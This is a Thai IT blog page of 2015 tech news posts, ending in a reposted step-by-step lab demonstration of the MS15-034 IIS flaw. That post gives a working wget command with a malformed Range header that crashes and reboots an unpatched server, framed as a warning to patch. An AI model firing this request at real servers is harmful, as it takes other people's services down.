วันจันทร์ที่ 27 เมษายน พ.ศ. 2558

กูเกิลขยันออกฟีเจอร์ใหม่ออกมาช่วยอำนวยความสะดวกให้ผู้ใช้จริงๆ ครับ ล่าสุด ได้ทำให้ช่อง "ค้นหา" ของเว็บไซต์ Google สามารถ ทำงานร่วมกับ Android ได้แล้ว เพียงผู้ใช้พิมพ์คำสั่งที่ถูกกำหนดไว้ ก็จะมีตัวเลือกพิเศษเพิ่มขึ้นมา
ในขณะนีมีคำสั่งที่เปิดให้ใช้งานได้แล้วอยู่ 5 คำสั่ง คือ
อย่างในภาพด้านล่างนี่ คือ การใช้งานคำสั่ง note to sef เพื่อส่งข้อความจาก Google Search ไปยังบนโทรศัพท์แอนดรอยส์ของเรา
nexus2cee_note-to-self-android
หรือลองตั้งนาฬิกาปลุกก็ได้ครับ เมื่อตั้งเสร็จก็กด Set alarm on your phone น่าเสียดายที่ตอนนี้ฟีเจอร์นี้ใช้งานได้แค่ผู้ใช้ในอเมริกาเท่านั้น แต่ไม่ต้องห่วงประเทศไทยก็จะใช้ได้ในอนาคตเช่นเดียวกันครับ
nexus2cee_set-alarm-card

 
  
 
ที่มา : http://www.androidpolice.com/2015/04/27/googles-desktop-search-also-lets-you-set-an-alarm-or-send-a-note-to-your-phone/it support ดูแลระบบคอมพิวเตอร์ วางระบบ network | วางระบบคอมพิวเตอร์ | it outsource
เขียนโดย ที่ ไม่มีความคิดเห็น:
ไวเกินคาดสำหรับฟิลเตอร์ใหม่ใน Instagram เพราะเมื่อปลายปีที่แล้ว เพิ่งจะปล่อยออกมา 5 ฟิลเตอร์ อาจจะเป็นเพราะตอนนี้คู่แข่งอย่าง VSCO Cam เริ่มได้รับความนิยมมากขึ้น 
งานนี้ผู้ใช้ iOS ได้รับการอัพเดตก่อนเช่นเคย Instagram 6.11.0 ไม่ได้มีแค่ฟิลเตอร์ใหม่ Lark, Reyes และ Juno เท่านั้น แต่ยังสามารถใส่อีโมจิลงไปในแฮชแท็กได้ด้วย ใครใช้ iOS สามารถอัพเดทได้แล้วผ่าน App Store
มาดูผลลัพธ์ในการแต่งภาพด้วยฟิลเตอร์ใหม่กันดูดีกว่า ว่าจะสวยขนาดไหน ผมว่าภาพออกมามาโทนฟิลม์เก๋ดีนะครับ
 IMG_2270  IMG_2271
IMG_2272  IMG_2273
 
  
 
ที่มา : https://itunes.apple.com/us/app/instagram/id389801252?mt=8
 
it support ดูแลระบบคอมพิวเตอร์ วางระบบ network | วางระบบคอมพิวเตอร์ | it outsource
เขียนโดย ที่ ไม่มีความคิดเห็น:
wearables
เครื่องติดตามข้อมูลการออกกำลังกาย หรือ Fitness trackers นานาชนิดกำลังได้รับความนิยมช่วยการบริหารกิจกรรมฟิตเนส คู่กับอัตราการบริโภคแคลอรี่ และวงจรการดูแลสุขภาพให้อยู่ตัว แต่ก็มาพร้อมกับการประมวลข้อมูลสำคัญส่วนตัวมากมายของผู้สวมใส่ จึงต้องคำนึงถึงความเป็นส่วนตัวของข้อมูลเหล่านั้น ดังนั้น นักวิจัยจากแคสเปอร์สกี้ แลป โรมัน อูนาเช็ค จึงทดลองตรวจสอบ สายรัดข้อมูลสำหรับออกกำลังกาย (Fitness wristbands) ที่ต้องต่อเชื่อมกับสมาร์ทโฟนและพบว่าผลลัพธ์ที่ได้นั้นน่าสะพรึงทีเดียว
ผลการวิจัยพบว่า วิธีการตรวจสอบตัวตนที่ถูกต้องในสายรัดข้อมือหลายยี่ห้อที่เป็นที่นิยมนั้นกลับอนุญาตให้เธิร์ดปาร์ตี้ต่อเชื่อมเข้ามาโดยตรงที่อุปกรณ์ได้เลยเพื่อดำเนินตามคำสั่งต่างๆ ที่มีอยู่แล้วโดยที่เราไม่รู้เรื่อง และยังล่วงล้ำเข้ามาเก็บข้อมูลอื่นบนดีไวซ์นั้นไปด้วย โดยยังจำกัดอยู่กับจำนวนสเต็ปที่ผู้สวมใส่เคลื่อนไหวก่อนหน้านั้นแต่ในอนาคตอันใกล้ เมื่อรุ่นต่อไปที่สามารถเก็บข้อมูลได้หลากหลายกว่านี้ออกวางตลาด ความเสี่ยงต่อการรั่วไหลของข้อมูลส่วนตัวทางการแพทย์ของผู้สวมใส่ก็จะเพิ่มขึ้นอย่างรู้สึกได้
การต่อเชื่อมแบบขอไปทีเช่นนี้ เอาความสะดวกที่สายรัดข้อมือจะจับคู่ (pair) กับสมาร์ทโฟนได้เลยดังนั้น ดีไวซ์ที่ใช้แอนดรอยด์ 4.3 หรือใหม่กว่า มักจะมีแอพที่ติดตั้งอยู่แล้ว และจับคู่เชื่อมต่อกับสายรัดข้อมือจากเวนเดอร์บางยี่ห้อได้เลย เวลาต่อเชื่อมนั้นยูสเซอร์ต้องยืนยันเพียงกดปุ่มบนสายรัดข้อมือ ซึ่งเป็นจุดที่ผู้ร้ายสามารถแทรกแซงเข้าตรงนี้ได้ เนื่องจากไม่มีหน้าจอ จึงใช้การสั่นสะเทือนเพื่อยืนยันการจับคู่อุปกรณ์ ซึ่งเหยื่อไม่มีทางรู้ได้เลยว่า ที่ได้ทำการยืนยันไปนั้นกับดีไวซ์ของตนหรือของคนอื่น
fitness
นักวิเคราะห์มัลแวร์อาวุโส แคสเปอร์สกี้ แลป นายโรมัน อูนาเช็ค กล่าว“การทดสอบความเป็นไปได้นี้ ขึ้นอยู่กับเงื่อนไขต่างๆ แต่ก็ได้พิสูจน์ว่าผู้ร้ายมีวิธีอาศัยช่องโหว่ที่ผู้พัฒนาดีไวซ์นั้นเปิดอ้าไว้ในการหาประโยชน์จนได้ ปัจจุบันเครื่องติดตามข้อมูลการออกกำลังกายยังไม่ค่อยก้าวหน้านัก เพียงนับสเต็ปและติดตามวงจรการนอนแต่ไม่ได้อะไรมากไปกว่านั้น แต่เจเนเรชั่นที่สองที่จะตามมาจะสามารถรวบรวมข้อมูลได้มากกว่านี้ จำเป็นอย่างยิ่งที่จะต้องเตรียมตัวเกี่ยวกับระบบความปลอดภัย ให้มีการป้องกันการสื่อสารระหว่างแทรคเกอร์กับสมาร์ทโฟนที่เหมาะสม”
ผู้เชี่ยวชาญของแคสเปอร์สกี้ แลป แนะนำยูสเซอร์ของสายรัดข้อมืออัจฉริยะที่กังวลเกี่ยวกับความปลอดภัยที่ใช้อยู่ ให้ตรวจสอบกับเวนเดอร์ถึงเวคเตอร์ที่อาจเป็นจุดที่แฮคเกอร์เจาะเข้ามาได้

เขียนโดย ที่ ไม่มีความคิดเห็น:

MS15-034 (IIS)

clip_image013.jpg
Published on April 16, 2015 with No Comments

Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034 – Critical

Microsoft ประกาศช่องโหว่ร้ายแรงเมื่อสองวันที่ผ่านมา (Published: April 14, 2015) โดยช่องโหว่นี้ทำให้สามารถถูกยิง HTTP Request มาบน IIS Web Server ที่ทำงานอยู่บน Windows 7, Windows 8, Windows 8.1, Windows Server 2008, และ Windows Server 2012 – R2
อ่านรายละเอียดของช่องโหว่นี้ และ Download Patch Update ได้จาก Link ด้านล่างนี้ครับ แนะนำให้รีบ ติดตั้ง Patch โดยด่วนครับ
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034

ตัวอย่างวิธียิงให้ IIS Server ล่มแบบ Step By Step

จากตัวอย่างจำลองนี้ผมใช้เครื่อง Simulation จำนวน 2 เครื่องครับ ดูตามรูปด้านล่างผมเรียกว่าเครื่อง A และ เครื่อง B แล้วกันนะครับ
เครื่อง A เป็นเครื่องที่ลง Windows 2012 พร้อมกับ Enable Feature IIS
เครื่อง B เป็นเครื่อง Windows ที่ได้ติดตั้งโปรแกรม wget เพื่อให้สามารถใช้คำสั่ง unix บน windows ได้
รูปภาพด้านล่างนี้เป็น OS Version ของเครื่อง A ครับ
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
โปรแกรม wget สามารถ Download ได้ที่ Link ด้านล่างนี้ครับ
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
หลังจาก Download เรียบร้อยแล้ว ทำการติดตั้งที่เครื่อง B ได้เลยครับ
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
ขั้นตอนติดตั้งไม่มีอะไรมากครับ กด next ไปได้เลย หากท่านไหนสงสัยเรื่องขั้นตอนติดตั้ง ขอแนะนำให้กดปิดหน้าเวปนี้ไปเลยครับ T T
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
ระหว่างการติดตั้งให้จำ Path ที่ได้ทำการติดตังลงไปด้วยครับ เพราะเราต้องเรียกใช้อีกครั้งผ่าน Command line
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
ที่เครื่อง B หลังจากที่ติดตั้งเรียบร้อยแล้ว ให้ทำการเข้าไปยัง Path นี้ครับเพื่อรอเรียกใช้คำสั่ง (ดูตามรูปด้านล่างครับ)
C:\Program Files (x86)\GnuWin32\bin\
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
หลังจากนั้นลองเปิด URL ของเครื่อง A ดูครับ ว่าเข้าได้ปกติหรือเปล่า ในตัวอย่างนี้คือเรียก URL ของเครื่อง A ได้ตามปกติครับ
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
หลังจากที่เรียก URL ได้ปกติแน่นอนแล้ว ลองยิงคำสั่งดูครับ ดูตามรูปด้านล่างครับ
Wget.exe –header=”Range: bytes=18-18446744073709551615″ http://192.168.109.128/iis-8.PNG
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034
หลังจากยิงชุดคำสั่งง่าย ๆ นี้ไป
เครื่อง A ก็ reboot บาย ๆ ไปเรียบร้อยแล้วครับ T T จบการทดสอบแต่เพียงเท่านี้
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034

บทสรุป

ในบทความนี้ไม่ได้มีเจตนาจะสอนให้ Hack หรือทำอันตราย Website ใด ๆ ทั้งสิ้นนะครับ เนื่องจากผู้เขียนเองก็ไม่มีความชำนาญอะไรมากนัก เพียงอยากจะสื่อให้พี่น้อง IT Pro ทราบว่าเครื่องมือในการโจมตี และชุดคำสั่งง่าย ๆ ก็ทำให้ระบบของเราหยุดให้บริการได้แล้ว
จึงจำเป็นที่จะต้องให้ความสำคัญถึงการติดตั้ง Security Patch Update ให้เป็นประจำ
** การกระทำใด ๆ นอกเหนือจาก Environment ทดสอบ หรือนำไปใช้กลั่นแกล้งในระบบจริงของผู้ให้บริการอื่น ๆ ถือเป็นความผิดทางกฏหมายนะครับ
Step By Step วิธีแสนง่าย ยิง IIS ให้ร่วงตามช่องโหว่หมายเลข Microsoft Security Bulletin MS15-034

แหล่งอ้างอิง

วันนี้ Facebook feed ของเพื่อน ๆ มีการ Share เรื่องนี้เยอะมากเลยครับ ผมรวบรวม link ที่น่าสนใจไว้ด้านล่างนี้ครับ
http://www.r00tsec.com/2015/04/resource-for-ms15-034-httpsys-exploit.html

credit : http://www.mvpskill.com/kb/step-by-step-%E0%B8%A7%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B9%81%E0%B8%AA%E0%B8%99%E0%B8%87%E0%B9%88%E0%B8%B2%E0%B8%A2-%E0%B8%A2%E0%B8%B4%E0%B8%87-iis-%E0%B9%83%E0%B8%AB%E0%B9%89%E0%B8%A3%E0%B9%88%E0%B8%A7.html

เขียนโดย ที่ ไม่มีความคิดเห็น:
สมัครสมาชิก: ความคิดเห็น (Atom)